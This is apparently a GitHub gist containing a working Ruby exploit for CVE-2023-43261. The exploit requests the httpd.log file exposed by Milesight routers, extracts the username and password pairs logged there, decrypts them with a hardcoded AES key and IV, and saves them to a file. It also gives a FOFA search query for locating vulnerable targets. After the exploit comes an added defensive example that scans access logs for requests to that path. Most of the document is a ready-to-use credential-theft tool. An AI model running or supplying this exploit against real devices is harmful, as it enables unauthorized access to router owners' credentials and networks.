@komodoooo
Created October 8, 2023 14:08
CVE-2023-43261 exploit
require 'http'
require 'openssl'
puts """
CVE-2023-43261
Milesight routers information disclosure exploit
By komodo\n
"""
=begin
FOFA query to search vulnerable targets:
fid="GbJynh0UR3NG6v4f7DclRQ=="
=end

# Base64-decode a string.
def d64(text)
  return text.unpack("m")[0]
end

$cont=1
$dirname="Milesight_dump"

# Create and enter the output directory; if the name is taken, retry with a counter suffix.
def dir(name=$dirname)
  begin
    Dir.mkdir(name)
    Dir.chdir(name)
  rescue Errno::EEXIST
    $cont+=1
    dir("#{$dirname}-#{$cont}")
  end
end

# Decrypt a logged password with the static AES-128-CBC key and IV.
# On any failure the input is returned unchanged.
def decrypt(password)
  begin
    cipher = OpenSSL::Cipher.new('AES-128-CBC')
    cipher.decrypt
    cipher.key, cipher.iv = "1"*16, "2"*16
    decrypted_data = cipher.update(d64(password))+cipher.final
    return decrypted_data.unpack('C*').pack('C*').force_encoding('utf-8').to_s
  rescue
    return password
  end
end

def main(url)
  # Drop a trailing slash from the base URL.
  url.delete_suffix!("/") unless url[-1..-1] != "/"
  # TLS certificate verification is disabled for the request.
  @ctx = OpenSSL::SSL::SSLContext.new()
  @ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
  r=HTTP.get("#{url}/lang/log/httpd.log", :ssl_context=>@ctx)
  if r.code == 200 && r.body.to_s.include?("password")
    dir()
    File.open("!target.txt", "w"){|f|f.write(url)}
    # Extract username/password pairs recorded in the log.
    credentials = r.body.to_s.scan(/"username":"(.+?)","password":"(.+?)"/)
    log = File.open("credentials.txt", "w")
    credentials.each do |username, password|
      log.write("Username: #{username}, Password: #{decrypt(password)}\n")
    end
    log.close()
    puts File.read("credentials.txt")
    puts "\nCredentials saved on '#{Dir.pwd.split("/")[-1]}/credentials.txt' file."
  else
    puts "Not vulnerable! :(\n"
  end
end

begin
  print "Base URL: "
  main(gets.chomp)
rescue => e
  abort(e.to_s)
end
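
For defenders, the single request made by the script above is easy to find in access logs. The following is an added example, not part of the original gist: it scans Combined Log Format lines (an assumed reverse-proxy or upstream log; the sample lines and the `normalize_path`, `classify` and `scan` helper names are constructed for illustration) for requests to `/lang/log/httpd.log` and separates served responses from blocked probes.

```ruby
# Added defensive example (not from the original gist).
LOG_PATH = "/lang/log/httpd.log" # path requested by the script above

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status bytes ...
LINE_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>[A-Z]+) (?<target>\S+) [^"]*" (?<status>\d{3}) (?<bytes>\S+)/

# Reduce a request target to a comparable path: drop scheme/host and query,
# percent-decode, and collapse repeated slashes.
def normalize_path(target)
  path = target.b.sub(%r{\Ahttps?://[^/]+}i, "").split("?", 2).first.to_s
  path.gsub(/%(\h\h)/) { $1.hex.chr }.squeeze("/")
end

# Return a finding hash for a log line that requests LOG_PATH, else nil.
# :exposed = the log file was served; :probe = requested but not served.
def classify(line)
  m = LINE_RE.match(line) or return nil
  return nil unless normalize_path(m[:target]) == LOG_PATH
  served = m[:status] == "200" && m[:bytes].to_i > 0
  { ip: m[:ip], time: m[:time], status: m[:status].to_i,
    verdict: served ? :exposed : :probe }
end

def scan(lines)
  lines.filter_map { |l| classify(l) }
end

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE = <<~LOG.lines
  198.51.100.7 - - [08/Oct/2023:14:10:01 +0000] "GET /lang/log/httpd.log HTTP/1.1" 200 48211 "-" "curl/8.1"
  203.0.113.9 - - [08/Oct/2023:14:11:30 +0000] "GET //lang/log/%68ttpd.log?x=1 HTTP/1.1" 403 162 "-" "-"
  192.0.2.44 - - [08/Oct/2023:14:12:02 +0000] "GET /login.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
LOG

if __FILE__ == $0
  scan(SAMPLE).each do |f|
    puts "#{f[:verdict]} #{f[:ip]} [#{f[:time]}] status=#{f[:status]}"
  end
end
```

An `:exposed` finding means the log was served to the client, so any credentials recorded in it should be treated as disclosed and rotated.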